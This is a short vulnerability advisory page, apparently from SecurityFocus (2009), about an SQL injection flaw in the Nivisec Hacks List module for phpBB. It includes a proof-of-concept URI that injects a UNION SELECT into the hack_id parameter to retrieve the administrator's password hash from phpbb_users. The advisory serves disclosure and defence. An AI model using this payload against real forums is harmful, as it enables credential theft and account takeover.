Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Nivisec Hacks List HACK_ID SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

The following prof-of-concept URI is available:

http://example.com/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash







 

Privacy Statement
Copyright 2009, SecurityFocus